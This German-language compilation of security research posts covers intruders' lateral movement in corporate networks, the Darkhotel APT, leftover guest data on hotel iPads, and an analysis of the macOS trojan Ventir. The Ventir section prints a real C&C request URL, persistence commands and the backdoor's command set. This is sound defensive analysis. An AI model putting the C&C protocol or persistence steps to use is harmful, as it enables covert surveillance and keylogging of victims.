Nachdem sich ein Online-Gangster die Kontrolle über irgendein Anwendersystem innerhalb eines Unternehmensnetzwerks verschafft hat, lassen sich alle folgenden Ereignisse in drei aufeinanderfolgende Etappen einteilen: Einnistung im System, Analyse der Umgebung und Ausbreitung. Für die Umsetzung jeder dieser Etappen gibt es eine Vielzahl von Möglichkeiten, die sich durch die technischen Methoden, Strategien und Taktiken voneinander unterscheiden. Die möglichen Vorgehensweisen eines Cyberkriminellen, die auf die Einnistung, Analyse und Ausbreitung im Unternehmensnetzwerk ausgerichtet sind, sind auf dem unten stehenden Schema dargestellt.


Schema der möglichen Vorgehensweisen eines Cyberkriminellen

Für IT-Sicherheitsexperten ist es wichtig, die Anzeichen zu kennen, die rechtzeitig auf die eine oder andere Attacke hinweisen. Mit Hilfe des vorgeschlagenen „Aktionswegweisers“ können IT-Sicherheitsfachleute eine Attacke erkennen, indem sie die Ereignisse im Netzwerk mit den verschiedenen möglichen Vorgehensweisen Cyberkrimineller abgleichen.

Einnistung im System

In den ersten Minuten und Stunden nach dem Eindringen in ein Unternehmensnetzwerk lädt ein Hacker normalerweise Tools (unter anderem schädliche) auf den attackierten Computer, die für die folgenden Aktionen benötigt werden: Sammeln von Informationen über das System und die installierte Software, Suche nach Dateien und Daten, Verbindungsherstellung mit dem Steuerungszentrum (C&C), Diebstahl von Kontodaten, Prüfung von Passwörtern, Hacken von Accounts, Erhöhung der Privilegien, Infektion des Systems, Abfangen des Netztraffics, Scannen der Geräte im Netz usw.

Um den Download aller benötigten Werkzeuge vor den Augen der Netzwerkadministratoren und IT-Sicherheitsexperten zu verbergen und den Alarm aller möglichen Schutzlösungen zu deaktivieren, greifen Cyberkriminelle auf Tricks und Kniffe unterschiedlicher Komplexität zurück:


  • Die Dateien werden über Allerwelts-Netzprotokolle/-Ports (HTTP, FTP, HTTPS, SFTP) übermittelt und gehen in dem enormen Strom des alltäglichen Anwender-Traffics unter.

  • Die Dateien werden unter Einsatz von Fast Flux-Netzen oder über Tor von gehackten Servern geladen.

  • Die Dateien werden gestückelt übertragen, in obfuskierter und/oder verschlüsselter Form.

  • Manchmal werden zur Übertragung verschiedene Steganografie-Arten benutzt, beispielsweise Verbergen von Daten in Audio/Video-Dateien, Bildern oder Headern von Internet-Protokollen (insbesondere, wenn die Allerweltsports von einer Firewall geschützt werden).

Nach dem Download der benötigten Tools versucht der Cyberkriminelle, sich Zugriff auf den Account des lokalen Administrators oder auf das Systemkonto zu verschaffen. Im ersten Fall wird üblicherweise Software zum Abfangen der Tastatureingaben, zum Überprüfen der Passwörter, zum Hacken von Accounts oder zum Phishing verwendet. Im zweiten Fall, also für den Zugriff auf den System-Account (d.h. auf Rechte auf Kernel-Ebene), kommen normalerweise Exploits zu Sicherheitslücken in Systemdiensten zum Einsatz.

Unter Verwendung der so erhaltenen Privilegien ist ein Cyberkrimineller in der Lage, tief ins System einzudringen, nachdem er ein Rootkit oder Bootkit ins Betriebssystem eingeschleust hat, er kann das System von allen Spuren des Eindringens säubern und seine Tools sowie die Spuren einer aktiven Infektion vor den lokalen Schutzmitteln verbergen. Wenn es einem Cyberkriminellen nicht gelungen ist, sich auf die „klassische“ Art und Weise im System festzusetzen, so kann er eine automatische Infektion des Systems konfigurieren, indem er einen Standard Task Schedulers verwendet.

Selbstverständlich können sich in jedem konkreten Fall die Arten des „Einnistens“ im System von der oben stehenden Beschreibung unterscheiden. Doch wie wir bereits eingangs erwähnten, ist es für Informationssicherheitsexperten wichtig, die Prinzipien der Angriffsdurchführung zu verstehen und sich die Aufgaben vorstellen zu können, die ein Cyberverbrecher zu lösen hat. So besteht im Stadium der Einnistung die Hauptaufgabe eines Angreifers darin, sich einen langfristigen und zuverlässigen Zugriff auf das attackierte System zu organisieren. Im Allgemeinen besteht die Lösung des Problems des entfernten Zugriffs aus zwei Teilen: Schaffung eines Datenübertragungskanals und Einschleusung von Mitteln zu entfernten Steuerung (Backdoor).

In Abhängigkeit von der Netzwerkkonfiguration, den Firewall-Policies und den Einstellungen der Angriffserkennungssysteme und der Systeme zur Verhinderung von Einschleusungen (IDS/IPS) wenden Cyberkriminelle entweder eine direkte Verbindung oder eine Rückverbindung an. Eine direkte Verbindung (ein Cyberkrimineller stellt eine Verbindung mit einem angegriffenen System her) ist beispielsweise nur dann möglich, wenn das System eine externe IP-Adresse und offene Netzwerk-Ports hat, wobei die externe Verbindung zu diesen nicht durch eine Firewall blockiert werden darf. Sind diese Voraussetzungen nicht gegeben, wird eine Rückverbindung aufgebaut, d.h. ein angegriffenes System stellt eine Verbindung mit einem entfernten Server her. Unabhängig vom Verbindungstyp werden für die Datenübermittlung dieselben Methoden benutzt, wie auch für den Download von Tools und Schadsoftware auf einen infizierten Computer, und zwar werden die Daten über Allerwelts-Protokolle/Ports in verschlüsselter/obfuskierter Form unter Verwendung von Fast Flux oder Tor übermittelt. Als Datenübertragungskanäle können Cyberverbrecher zudem gewöhnliche Anwendersoftware benutzen, wie z.B. Cloud-Speicher, E-Mail-Programme, IM-Clients usw.

Umgebungsanalyse

Vor, nach oder gleichzeitig mit der Einnistung im System muss ein Online-Verbrecher unbedingt Informationen über das Betriebssystem und seine Konfiguration, über die installierten Updates, Programme und Schutzlösungen sammeln. Diese Informationen sind nicht nur zur Einschätzung der aktuellen Situation und Planung der nächsten Angriffsschritte überaus nützlich, sondern auch bezüglich der richtigen Auswahl der erforderlichen Tools und Exploits.

Zum Sammeln von Systeminformationen sind die in den Betriebssystemen vorhandenen Mittel meist völlig ausreichend:


  • cmd, regedit, vbs, powershell in Windows,

  • bash, grep, python, perl in Unix/Linux und Mac OS.

Vom Standpunkt eines Hackers aus liegt eine Menge Vorteile in der Verwendung der oben aufgeführten Tools – sie sind in jedem System vorhanden und sogar für einen Nutzer mit eingeschränkten Rechten verfügbar. Zudem wird ihre Funktion von den meisten Schutzlösungen nicht kontrolliert. Zur Lösung der komplizierteren Aufgaben verwenden Online-Gangster sowohl allgemein bekannte als auch eigene Werkzeuge, die es ihnen ermöglichen, den Netzwerktraffic abzufangen, die Geräte im Netz zu scannen und sich mit verschiedenen Netzwerkdiensten zu verbinden, indem sie die Domain-Autorisierung verwenden usw. Wenn die Hacker-Tools dabei in, sagen wir einmal Python, geschrieben wurden, installieren die Verbrecher gewiss die notwendige Software auf einem infizierten Computer. In diesem Fall wird Python (und anderes dieser Art) vermutlich nicht mit Hilfe eines Rootkits im System verborgen werden, da dies Probleme mit der Funktion des Interpreters hervorrufen könnte.

Zur Suche und Analyse anderer Geräte im Unternehmensnetzwerk setzen Cyberkriminelle Methoden des passiven und aktiven Scannens ein. Insbesondere mit Hilfe eines Sniffers zum Abhorchen des Traffics vom lokalen Netzwerk-Interface können problemlos verschiedene Geräte an ARP-Paketen oder aktiven Verbindungen erkannt werden, Adressen von Servern können identifiziert werden, auf denen sich Unternehmensanwendungen befinden, wie z.B. ActiveDirectory, Outlook, Datenbanken, Unternehmens-Websites und vieles mehr. Um genaue Informationen über einen konkreten Netzknoten zu erhalten, verwenden Cyberkriminelle Netzscanner (beispielsweise nmap), die die Identifizierung von verfügbaren Netzdiensten, das Erraten von Software-Name und -Version sowie das Auffinden einer Firewall und der Systeme IDS/IPS ermöglichen.

Ausbreitung

Nachdem sich ein Cyberkrimineller im System festgesetzt, einen zuverlässigen Kanal zum entfernten Zugriff organisiert und ausreichend Informationen über das Unternehmensnetzwerk gesammelt hat, ist sein weiteres Vorgehen normalerweise auf das Erreichen seines eigentlichen Zieles ausgerichtet – das kann im Diebstahl von vertraulichen Informationen bestehen, in Angriffen auf die Unternehmensinfrastruktur, den Erhalt der Kontrolle über kritische Systeme zu Erpressungszwecken oder aber es ist durch eigene Bedürfnisse motiviert. Mit Ausnahme von Fällen, in denen das zuerst angegriffene System auch das Endziel darstellt (beispielsweise das Notebook eines СЕО, der zentrale Server oder die Hauptwebsite), muss der Angreifer unbedingt die Kontrolle über andere Systeme innerhalb des Unternehmensnetzwerks erhalten – in Abhängigkeit von dem gewählten Infektionsziel kann der Infektionsversuch zielgerichtet oder breit gestreut sein.

Für einen Angriff auf die Infrastruktur ist eher eine Masseninfektion erforderlich – sowohl von Servern, die die Ausführung verschiedener Geschäftsprozesse gewährleisten, wie auch von Workstations der Betreiber und Administratoren. Will ein Cyberangreifer vertrauliche Informationen stehlen oder etwas erpressen, so muss er andererseits mit großer Vorsicht vorgehen und nur die vorrangigsten Systeme angreifen.

Die Ausbreitung innerhalb des Unternehmensnetzwerks kann mit einer Vielzahl von Mitteln umgesetzt werden. Ebenso wie bei der Einnistung im System und der Umgebungsanalyse wählen die Cyberkriminellen die einfachsten Lösungen, beispielsweise die Verwendung bestehender Accounts. Startet ein Online-Verbrecher beispielsweise Schadcode von einem Domain-Account des Anwenders eines infizierten Systems, so kann er sich problemlos mit verschiedenen Netzwerkdiensten verbinden (auf die der Anwender Zugriff hat), indem er die Domain-Autorisierung verwendet (Single Sign-On), d.h. also ohne Angabe von Nutzername und Kennwort. Verwendet er andererseits einen Abfänger der Tastatureingaben, so kann er leicht an Nutzername und Kennwort sowohl zum Domain-Account als auch zu anderen Services gelangen, die die Domain-Autorisierung nicht unterstützen. Zudem kann ein Cyberverbrecher versuchen, eine Sicherheitslücke in den Mechanismen zum Speichern und Überprüfen von Account-Daten ausnutzen oder versuchen das Passwort zu erraten.

Der effektivste Verbreitungsweg innerhalb eines Unternehmensnetzwerks ist die Ausnutzung von Sicherheitslücken, da ein großer Teil des Schutzes des Unternehmensnetzwerks auf die Abwehr von äußeren Attacken konzentriert ist. Das hat zur Folge, dass sich innerhalb des Netzwerks eine Vielzahl unterschiedlichster Schwachstellen, ungeschützter Dienste, Testserver, Steuerungs-/Virtualisierungssysteme usw. finden. Die Praxis zeigt, dass – selbst wenn den IT-Ingenieuren und Informationssicherheitsexperten alle Sicherheitslücken im Unternehmensnetzwerk bekannt sind – deren Beseitigung Jahre dauert, da dieser Prozess eine Menge Ressourcen erforderlich macht (Personenstunden). Trotzdem verwenden erfahrene Hacker Exploits für bekannte Sicherheitslücken nur mit größter Vorsicht, und ziehen es vor, ungeschützte Unternehmensdienste anzugreifen – denn wenn im Netzwerk doch IDS/IPS verwendet wird (lokal oder auf Netzwerkebene), so kann der Einsatz von Exploits für bekannte Sicherheitslücken zur Entdeckung des Cyberkriminellen führen.

Erkennung von Angriffen

Auf jeder Angriffsetappe nutzen Cyberkriminelle häufig die Umgebung und die zur Verfügung stehenden Mittel zu ihren eigenen Zwecken aus und bleiben so vor dem Hintergrund der Aktivität gewöhnlicher Anwender unbemerkt. Zur Lösung dieses Problems muss das Zuviel an Umgebung und Geschäftsprozessen dort verringert werden, wo es möglich ist. Und in allen anderen Fällen muss unbedingt genau verfolgt werden, was vor sich geht, Anomalien müssen aufgedeckt und es muss auf sie reagiert werden.

Anschauliche Beispiele für so ein Zuviel in den Geschäftsprozessen sind der freie Zugriff auf Geschäftsaktiva (vertrauliche Dokumente, kritische Anwendungen, Ausrüstung usw.), die Rechte eines lokalen Administrators und die Möglichkeit, sich entfernt mit dem Unternehmensnetzwerk zu verbinden für diejenigen, die solche Rechte und einen solchen Zugriff überhaupt nicht benötigen. Das Gesagte bezieht sich nicht nur auf die Aufteilung der Rechte auf Domain-Ebene, sondern auch auf der Ebene von Anwendungssoftware – normalerweise benötigen Browser keinen Zugriff auf den Speicher anderer Prozesse, und es ergibt keinen Sinn, dass MS Office Treiber installiert.

Als Beispiel für ein Zuviel der Umgebung kann man das Vorhandensein von Software auf dem Computer eines durchschnittlichen Mitarbeiters ins Feld führen (der kein Entwickler, Tester, Administrator oder Informationssicherheitsspezialist ist), die in der Lage ist, Netzwerktraffic abzufangen, das Netz zu scannen, entfernten Zugriff herzustellen, einen lokalen HTTP/FTP-Server zu erstellen, Dritt-Netzwerk-Ausrüstung zu verwenden (Wi-Fi und 3G-Modems) oder Mittel zur Softwareentwicklung usw.

Eine effektive Strategie zur Verhinderung von Angriffen innerhalb des Unternehmensnetzwerks besteht darin, Cyberkriminellen keine Möglichkeit zu geben, verborgen zu agieren und sie vielmehr zu komplizierten und riskanten Manövern zu zwingen, die es Informationssicherheitsexperten ermöglichen, eine Attacke zu identifizieren und die Bedrohung rechtzeitig zu neutralisieren. Zu diesem Zwecke sollte es in einem Unternehmensnetzwerk zwei Dinge geben: einen klugen Schutz und ein Managementsystem für Informationssicherheit (Information Security Management System, ISMS). Informationssicherheit in einem Unternehmensnetzwerk, die auf der Iteration dieser beiden Technologien basiert, unterscheidet sich grundlegend von dem veralteten Schutzmodell, denn sie ist in der Lage alles zu sehen, was im Netz vor sich geht, und umgehend auf Bedrohungen zu reagieren.

Mit klugen Schutzmechanismen meinen wir durchaus die alt hergebrachten Antivirenprogramme, Firewalls, IDS/IPS/HIPS, Anwendungskontrollen, Gerätekontrollen und so weiter. Sie müssen allerdings in der Lage sein, mit dem ISMS zu interagieren. Solche Schutzmechanismen sollten nicht nur alle erdenklichen Informationen sammeln und an das ISMS übermitteln, sondern in der Lage sein, Befehle auszuführen, die das Blockieren von Zugriffsversuchen, eine Verbindungsherstellung, Datenübertragung über das Netz, den Start von Anwendungen, das Lesen und Schreiben von Dateien usw. beinhalten. Damit das alles auch so funktioniert, muss der zuständige IT-Sicherheitsexperte selbstverständlich in der Lage sein, legitime Aktivität von schädlicher zu unterscheiden.

Die Darkhotel-APT


  Global Research and Analysis Team of Kaspersky Lab       10 November 2014 | 12:00  MSK

Ihr Kommentar  

http://youtu.be/4bNit5COBRI


Technical Appendix

PDF version


Ebenso wie die als „Crouching Yeti“ bezeichnete weltweite Cyber-Angriffswelle ist die Darkhotel-APT ein ungewöhnlich undurchsichtiger, ausdauernder und gut ausgestatteter Bedrohungsakteur, der eine seltsame Kombination von Charakteristika aufweist.

Diese APT greift ihre Opfer ganz präzise durch Spear-Phishing mit hochentwickelten Flash Zero-Day-Exploits an und umgeht auf diese Weise erfolgreich die neusten Abwehrmechanismen in Windows und Adobe, und andererseits infizieren die Angreifer auch völlig unpräzise eine große Zahl willkürlicher Opfer mit Hilfe von Peer-to-Peer-Verbreitungstaktiken. Hinzu kommt eine höchst ungewöhnliche Eigenschaft dieser Gruppe: Seit Jahren unterstützt die Darkhotel-APT die Fähigkeit, Hotelnetzwerke auszunutzen, um ausgewählten Opfern zu folgen und sie anzugreifen, wenn diese durch die Welt reisen. Bei diesen Reisenden handelt es sich meist um Führungskräfte aus den verschiedensten Branchen, die in der asiatisch-pazifischen Region Geschäfte machen und Outsourcing betreiben, unter anderem CEOs, Senior Vice Presidents, Vertriebs- und Marketingdirektoren sowie Spitzenkräfte aus dem Bereich Forschung- und Entwicklung. Dieses Eindringen in ein Hotelnetzwerk liefert den Angreifern präzisen weltumspannenden Zugriff auf hochrangige Ziele. Unseren Beobachtungen zufolge begann der höchste Level der Hotel-Netzwerk-Offensive im August 2010 und zog sich bis 2013, und wir ermitteln auch in einigen Hotel-Netzwerk-Fällen aus dem laufenden Jahr 2014.

Um p2p-Netzwerke zu verseuchen, die dann zu Masseninfektionen genutzt werden, delegitimieren die Angreifer außerdem Zertifikatsstellen, um so ihre Attacken voranzutreiben. Sie missbrauchen schwach implementierte digitale Zertifikate, um ihren Schadcode zu signieren. Auf diese Art wurde das Vertrauen von mindestens zehn Zertifikatsstellen missbraucht. Aktuell stehlen und verwenden die Verbrecher hinter dieser Bedrohung andere legitime Zertifikate, um ihre weitestgehend statische Backdoor und das Infostealer-Toolset zu signieren. Im Laufe der Zeit dehnt sich ihre Infrastruktur zudem aus und zieht sich dann wieder zusammen, ohne dass ein ersichtliches Muster dahinter zu erkennen wäre. Die Malware ist sowohl durch flexible Datenverschlüsselung als auch auffallend schlecht durch schwache Funktionen geschützt.

Die Opfer stammen aus den folgenden Bereichen:

  • Sehr große Elektronik-Hersteller

  • Investmentkapital und Privatkapital

  • Pharmazie

  • Kosmetische und chemische Produktion, Offshoring und Vertrieb

  • Automobilhersteller – Offshoring-Services

  • Automobilindustrie: Bauteile, Vertrieb, Verkauf und Services

  • Rüstungsindustrie

  • Strafverfolgungsbehörden und Militärdienste

  • Nicht-Regierungsorganisationen

Etwa 90 Prozent der Infektionen scheinen in Japan, Taiwan, China, Russland und Südkorea erfolgt zu sein, teilweise aufgrund der wahllosen Verbreitung der Malware. Insgesamt beträgt die Zahl der Infektionen seit dem Jahr 2008 mehrere Tausend. Die interessanteren reisenden Ziele sind Topmanager aus den USA und Asien, die in der asiatisch-pazifischen Region Geschäfte machen und Investitionen tätigen. Eine Kombination der Detektionen des Kaspersky Security Network (KSN) und der Command- und Control-Daten zeigten Infektionen in den USA, den Vereinigten Arabischen Emiraten, den Philippinen, in Honkong, Indien, Indonesien, Deutschland, Iran, Mexiko, Belgien, Serbien, im Libanon, in Pakistan, Griechenland, Italien und anderen Ländern. Die geografische Verteilung der Opfer dieser Bedrohung ist weit gestreut und viele signifikante Opfer reisen regelmäßig in und durch viele dieser Länder. So ändert sich die geografische Position der Opfer, während sie ständig unterwegs sind.

Als Experten von Kaspersky Lab den Orten, an denen sich Darkhotel-Vorfälle zugetragen haben, mit Honigtopf-Rechnern im Gepäck einen Besuch abstatteten, haben sie keine Darkhotel-Attacken provozieren können. Das lässt darauf schließen, dass die APT selektiv vorgeht.
Weitere Untersuchungen haben zudem gezeigt, wie sorgfältig die Angreifer vorgegangen sind, um ihre Aktivität zu verbergen – sobald ein Ziel infiziert worden war, löschten sie ihre Tools aus der Staging-Area des Hotel-Netzwerks, behielten aber einen verborgenen Status bei.

In den letzten paar Jahren wurde immer wieder häppchenweise etwas über die Aktivität von Darkhotel oder über die Bestandteile der Malware bekannt, aber wir konnten auch Darkhotel-Tools identifizieren, die in das Jahr 2007 zurückreichen. Unter Berücksichtigung der gut ausgestatteten, fortschrittlichen Exploit-Entwicklung und der umfassenden dynamischen Infrastruktur erwarten wir weitere Aktivität von Darkhotel in den kommenden Jahren. Unser Darkhotel-Bericht sowie die Anhänge mit den Indikatoren und technischen Details liefern einen stets aktuellen Überblick über die Aktivität dieses APT.

Hinterlegen Sie Ihr Passwort an der Rezeption


  Bestuzhev       24 Oktober 2014 | 14:40  MSK

Ihr Kommentar  

Einige Hotels, Restaurants und Flughäfen stellen ihren Kunden während ihres Aufenthaltes kostenlos Tablets zur Verfügung. Als ich kürzlich an einer Veranstaltung in einem solchen Hotel teilnahm und dort übernachtete, hatte ich die Möglichkeit, ein eigens in meinem Zimmer installiertes iPad kostenlos zu nutzen.

Zu meiner Überraschung enthielt es nicht nur die Tagesordnung der Veranstaltung und stellte zudem eine kostenlose WiFi-Verbindung bereit, sondern es enthielt auch eine Menge persönlicher Daten von früheren Gästen, die in demselben Zimmer abgestiegen waren.

Wenn ich persönliche Informationen sage, so meine ich damit Accounts mit vorgespeicherten Passwörtern, autorisierte Sitzungen in sozialen Netzwerken, Suchergebnisse aus dem Browser (zumeist pornografische Inhalte), vollständige Kontakte, die automatisch im Adressbuch gespeichert werden, iMessages und sogar ein Schwangerschaftskalender mit realen Informationen. Es war noch nicht einmal schwierig die Identität der Frau, die den Kalender benutzt hat, festzustellen, denn sie hatte ihre persönlichen Kontaktdaten auf dem Gerät hinterlassen:

















Mit den vollständigen Namen und E-Mail-Adressen im Cache des Gerätes war es nicht besonders schwierig, mit Hilfe von Google herauszufinden, dass es sich bei einigen der User um äußerst öffentliche Personen handelte, die für die Regierung des Landes arbeiten, in dem ich mich gerade aufhielt.

Die meisten Sitzungen waren noch immer geöffnet, so dass man tatsächlich auch im Namen der früheren Benutzer etwas posten oder Nachrichten versenden konnte:

In Bezug auf die Sicherheit ist das vollkommen inakzeptabel. Ein potentieller Angreifer hätte nicht nur die Möglichkeit, gesendete und empfangene Nachrichten zu lesen, sondern er hätte sich auch als das Opfer ausgeben und in seinem Namen Mitteilungen verschicken können.

Für mich ergibt sich hieraus zudem die perfekte Gelegenheit, Daten für Spear-Phishing-Angriffe auf prominente Persönlichkeiten zu sammeln. Angreifer aus dem klassischen Cybercrime-Milieu könnten ihre Opfer außerdem erpressen, was das reinste Kinderspiel wäre, da sie im Besitz aller erdenklichen Daten ihrer Opfer wären – die Namen der Pornofilme, die sie gesehen haben, eingeschlossen, und zwar mit genauer Datums- und Zeitangabe. Bedenkt man, dass einige der potentiellen Opfer öffentliche Personen sind, die für die Regierung arbeiten, ist es überaus wahrscheinlich, dass derartige Erpressungsversuche von Erfolg gekrönt wären.

Was läuft hier also falsch? Tja, ich würde sagen: alles. Erstens ist es sehr unklug, ein kostenloses öffentliches Gerät für die persönliche und private Kommunikation zu benutzen. Man kann nie wissen, ob es eine Backdoor auf dem Gerät gibt oder wer eigentlich hinter dieser Gastfreundschaft steckt. Zweitens: Wenn eine öffentliche Einrichtung seinen Gästen kostenlos mobile Geräte für die Dauer ihres Aufenthalts zur Verfügung stellen möchte, so ist es wichtig, dass diese zunächst sorgfältig konfiguriert werden, damit sensible Sicherheitspolicies angewandt werden und keine persönlichen Informationen, Passwörter usw. auf dem Gerät gespeichert werden können.

Vielleicht bin ich ja zu misstrauisch, aber wenn ich mich mit einem unbekannten und nicht vertrauenswürdigen Gerät wie einem Tablet in einem Raum befinde, das zudem mit einer Kamera und einem Mikrofon ausgestattet ist, so ziehe ich es vor, es auszuschalten und in einer Schublade zu verstauen. Ich musste das jeden Abend aufs Neue tun, nachdem das Reinigungspersonal es jeden Tag meines Aufenthalts in dem Hotel wieder zurück auf den Schreibtisch gestellt hatte.

Und auch wenn ein solches Gerät anständig konfiguriert ist und private Daten nicht sichtbar speichert, so sollte man immer bedenken, dass der nächste Gast durchaus ein IT-Experte sein könnte, der einfach ein Abbild des gesamten Gerätes erstellen und die eingegebenen privaten Daten dann Schritt für Schritt wiederherstellen könnte.

Folgen Sie mir auf twitter: @dimitribest


Trojaner Ventir: Basteln Sie sich Ihren eigenen MacOS-Spion


  16 Oktober 2014 | 17:47  MSK

Ihr Kommentar  

Vor gar nicht langer Zeit erreichte uns bei Kaspersky Lab eine interessante Datei (MD5 9283c61f8cce4258c8111aaf098d21ee) zur Analyse, die sich als multimodularer Schädling für MacOS X erwies. Bereits nach einer ersten vorläufigen Untersuchung war klar, dass diese Datei nichts Gutes im Schilde führt: Die gewöhnliche ausführbare 64-Bit mach-o-Datei enthielt in einer Datensektion weitere mach-o-Dateien, von denen eine im Autostart platziert worden war, was typisch ist für ein trojanisches Dropper-Programm.

Weiterführende Untersuchungen brachten zutage, dass sich innerhalb des Schädlings eine Backdoor, ein Keylogger sowie ein trojanisches Spionage-Programm verbergen. Besonders bemerkenswert ist, dass der Keylogger eine Kernel-Erweiterung mit offenem Quellcode verwendet, die für jeden Interessierten verfügbar ist, beispielsweise auf GitHub!

Derzeit werden die entdeckten Dateien in Abhängigkeit von ihrer Bestimmung folgendermaßen von den Antiviren-Lösungen von Kaspersky Lab detektiert als: Trojan-Dropper.OSX.Ventir.a, Backdoor.OSX.Ventir.a, Trojan-Spy.OSX.Ventir.a und not-a-virus:Monitor.OSX.LogKext.c.

Quelldatei (Trojan-Dropper.OSX.Ventir.a)

Sofort nach dem Start überprüft der Dropper durch den Aufruf der Funktion geteuid(), ob er über die Rechte eines Superusers (oder auch Root-Rechte) verfügt. Vom Ergebnis dieser Überprüfung hängt es ab, wo die Dateien des Trojaners installiert werden:

  • Verfügt der Schädling über Superuser-Rechte, werden die Dateien in /Library/.local und /Library/LaunchDaemons installiert;
  • Verfügt der Schädling nicht über Root-Rechte, so werden die Dateien an den Orten ~/Library/.local und ~/Library/LaunchAgents installiert (die Tilde “~” kennzeichnet den Pfad zum Heimordner des aktuellen Anwenders).

Alle Dateien des Trojaners, die auf einen infizierten Computer geladen werden, nehmen von vornherein ihren Platz in der Sektion „__data“ der Dropper-Datei ein.

Anordnung der Trojaner-Dateien innerhalb des Droppers

Im Endeffekt werden in einem infizierten System die folgenden Dateien installiert:

  1. Library/.local/updated – startet die Dateien update und EventMonitor erneut, falls sie unerwartet beendet werden sollten.
  2. Library/.local/reweb – dient dem Neustart der Datei updated.
  3. Library/.local/update – Backdoor-Modul.
  4. Library/.local/libweb.db –Datenbankdatei des Schädlings. Enthält von vornherein die globale Konfiguration des Trojaners, beispielsweise die Adresse des C&C.
  5. Library/LaunchAgents (oder LaunchDaemons)/com.updated.launchagent.plist – Eigenschaftsdatei, die zur Installation der Datei Library/.local/updated im Autostart mit Hilfe von Daemon launchd ausgeführt wird.
  6. In Abhängigkeit davon, ob Superuser-Rechte vorhanden sind:

    А) wenn sie vorhanden sind – /Library/.local/kext.tar. Des Weiteren wird das Archiv entpackt:

    • updated.kext – Treiber, der die Tastatureingaben des Nutzers abfängt;
    • Keymap.plist – Karte der Übereinstimmungen der Codes der gedrückten Tasten mit deren Werten;
    • EventMonitor – Agent, der die Tastatureingaben sowie einige Systemereignisse in der Datei Library/.local/.logfile protokolliert.

    B) wenn sie nicht vorhanden sind - ~/Library/.local/EventMonitor. Ein Agent, der den Namen des aktuell aktiven Fensters und die Tastatureingaben in der Datei Library/.local/.logfile protokolliert

Nach Installation der aufgezählten Dateien legt der Trojaner mit Hilfe des Standard-Konsolentools launchctl die Datei updated in den Autostart (Befehl launchctl load %s/com.updated.launchagent.plist).

Für den Fall, dass Superuser-Rechte vorhanden sind, lädt der Dropper daraufhin mit Hilfe des Standardtools OSX kextload den protokollierenden Treiber in den Kernel (Befehl kextload /System/Library/Extensions/updated.kext)

Daraufhin lädt Trojan-Dropper.OSX.Ventir.a die Datei reweb und löscht sich selbst aus dem System.

Die Dateien updated und reweb

Die Datei updated beendet alle Prozess mit dem Namen reweb (Befehl killall -9 reweb). Dann überprüft er in Abständen, ob die Prozesse EventMonitor und update laufen und startet sie, wenn nötig, neu.

Die Datei reweb beendet alle Prozess mit den Namen updated und update, woraufhin sie die Datei Library/.local/updated startet.

Die Datei update (Backdoor.OSX.Ventir.a)

Zu Beginn ihrer Arbeit verteilt die Backdoor die Felderwerte aus der config-Tabelle der Datenbank libweb.db nach lokalen Variablen zur weiteren Verwendung.

Für den Befehlsempfang wird eine HTTP GET-Anfrage der folgenden Art verwendet: http://220.175.13.250:82/macsql.php?mode=getcmd&key=1000&udid=000C29174BA0,

wobei key ein gewisser Schlüssel ist, der in libweb.db in der config-Tabelle gespeichert wird; udid eine МАС-Adresse ist, und 220.175.13.250:82 die IP-Adresse und den Port des C&C-Servers bezeichnen.

Diese Anfrage wird regelmäßig in kurzen Intervallen in einer Endlosschleife gesendet.

Die Backdoor kann die folgenden Befehle vom C&C ausführen:

  • reboot – Neustart des Computers;
  • restart – Neustart der Backdoor durch das Starten der Datei reweb;
  • uninstall – vollständiges Löschen der Backdoor aus dem System.
  • show config – Senden der Daten aus der config-Tabelle an den C&C-Server;
  • down exec – Aktualisierung der Datei update, Update-Download vom C&C-Server;
  • down config – Aktualisierung der Konfigurationsdatei libweb.db, Download des Updates vom C&C-Server;
  • upload config – Senden der Datei libweb.db an den C&C-Server;
  • update config:[Parameter] – Update der config-Datei in der Datenbankdatei libweb.db, in den Parametern werden die Felderwerte der Tabelle übermittelt;
  • executeCMD:[Parameter] – Ausführung des Befehls, der im Parameter über die Funktion popen(cmd, “r”) angegeben wird, Senden der Ausgabe des Befehls an den C&C-Server;
  • executeSYS:[Parameter] – Ausführung des Befehls, der im Parameter über die Funktion system(cmd) angegeben wird;
  • executePATH:[Parameter] – Start einer Datei aus dem Verzeichnis Library/.local/, der Dateiname wird im Parameter angegeben;
  • uploadfrompath:[Parameter] – Upload der Datei mit dem im Parameter vermerkten Namen aus dem Verzeichnis Library/.local/ auf den C&C-Server;
  • downfile:[Parameter] – Download der Datei mit dem im Parameter angegebene Namen vom C&C-Server und Speichern der Datei gemäß dem im Parameter angegebenen Pfad.

Teil des Befehls, der vom Backdoor-Modul verarbeitet wird

Datei EventMonitor (Trojan-Spy.OSX.Ventir.a)

Diese Datei wird ins System geladen, wenn es dem Dropper nicht gelingt, Superuser-Rechte zu erhalten. Nach dem Start installiert Trojan-Spy.OSX.Ventir.a mit Hilfe der API-Funktionen des Carbon Event Managers seine Systemereignis-Routine. In der neuen Routine erfolgt das Abfangen von Ereignissen, die mit dem Betätigen von Tasten zusammenhängen sowie deren Protokollierung in der Datei ~/Library/.local/.logfile. Hilfstasten (wie etwa shift) erscheinen im Protokoll in der folgenden Form: [command],  [option],  [ctrl], [fn], [ESC], [tab], [backspace] usw.

Verarbeitung von Tastatur-Ereignissen

Ebenfalls direkt vor der Verarbeitung der Tastenbetätigungen erfolgt die Bestimmung des Namens des Prozesses, dessen Fenster aktuell aktiv ist. Zu diesem Zweck werden die Funktionen GetFrontProcess und CopyProcessName aus der Carbon-API verwendet. Der Name des Prozesses wird ebenfalls ins Protokoll aufgenommen in Form von [Application {Name_Prozess} is the frontwindow]. Diesem Umstand ist es zu verdanken, dass der Trojaner bestimmen kann, in welche Anwendung die protokollierte Phrase eingebettet wurde.

Datei kext.tar (not-a-virus:Monitor.OSX.LogKext.c)

Wie bereits oben erwähnt, wird das Archiv kext.tar auf den infizierten Computer geladen, wenn es dem Trojaner Trojan-Dropper.OSX.Ventir gelungen ist, Root-Rechte zu erhalten. In dem Archiv befinden sich drei Dateien:

  • updated.kext
  • EventMonitor
  • Keymap.plist

Das Programmpaket updated.kext ist eine Kernel-Erweiterung (kext) mit offenem Quellcode, die für das Abfangen von Tastaturbetätigungen vorgesehen ist. Diese Erweiterung wird von uns schon seit Langem als not-a-virus:Monitor.OSX.LogKext.c detektiert, und ihr Quellcode (wie ebenfalls bereits erwähnt) ist zum gegenwärtigen Zeitpunkt für jeden Interessierten verfügbar.

